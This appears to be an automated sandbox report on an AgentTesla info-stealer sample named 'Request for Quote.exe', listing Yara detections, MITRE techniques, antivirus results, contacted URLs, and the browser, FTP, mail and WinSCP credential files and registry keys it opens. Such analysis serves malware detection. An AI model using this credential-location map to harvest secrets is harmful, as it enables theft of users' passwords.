Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Users\user\Desktop\Request for Quote.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000014.00000002.496055035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249616180.0000000003DB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.346647833.0000000004839000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Newapp.exe PID: 996, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quote.exe PID: 2260, type: MEMORY
Source: Yara match	File source: Process Memory Space: Newapp.exe PID: 6108, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quote.exe PID: 6376, type: MEMORY
Source: Yara match	File source: 14.2.Newapp.exe.4a1e1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quote.exe.3ecf990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quote.exe.3ecf990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Request for Quote.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Newapp.exe.4b44450.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Newapp.exe.4b44450.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Newapp.exe.49b6d80.3.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Newapp.exe PID: 6108, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quote.exe PID: 6376, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000014.00000002.496055035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.249616180.0000000003DB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.346647833.0000000004839000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Newapp.exe PID: 996, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quote.exe PID: 2260, type: MEMORY
Source: Yara match	File source: Process Memory Space: Newapp.exe PID: 6108, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quote.exe PID: 6376, type: MEMORY
Source: Yara match	File source: 14.2.Newapp.exe.4a1e1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quote.exe.3ecf990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quote.exe.3ecf990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Request for Quote.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Newapp.exe.4b44450.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Newapp.exe.4b44450.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Newapp.exe.49b6d80.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Registry Run Keys / Startup Folder1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	System Information Discovery114	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Deobfuscate/Decode Files or Information1	Input Capture1	Query Registry1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Credentials in Registry1	Security Software Discovery311	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	Virtualization/Sandbox Evasion13	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Process Discovery2	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Request for Quote.exe	29%	Virustotal		Browse
Request for Quote.exe	17%	ReversingLabs	ByteCode-MSIL.Packed.Confuser
Request for Quote.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	29%	ReversingLabs	ByteCode-MSIL.Packed.Confuser

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Request for Quote.exe.280000.0.unpack	100%	Avira	HEUR/AGEN.1134873	Download File
5.2.Request for Quote.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
14.2.Newapp.exe.a80000.0.unpack	100%	Avira	HEUR/AGEN.1134873	Download File
21.2.Newapp.exe.3f0000.0.unpack	100%	Avira	HEUR/AGEN.1134873	Download File
20.2.Newapp.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.fontbureau.comrsywa	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://qunect.com/download/QuNect.exe&Operation	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/=v	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-	0%	Avira URL Cloud	safe
http://uHcRbL.com	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/U	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://flagmonkey.com.au	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://qunect.com/download/QuNect.exe	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://www.founder.com.cn/cn%u	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/n	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
https://api.ipify.org%$	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/x	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/x	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/x	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/n	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/n	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/n	0%	URL Reputation	safe
http://mail.flagmonkey.com.au	0%	Avira URL Cloud	safe
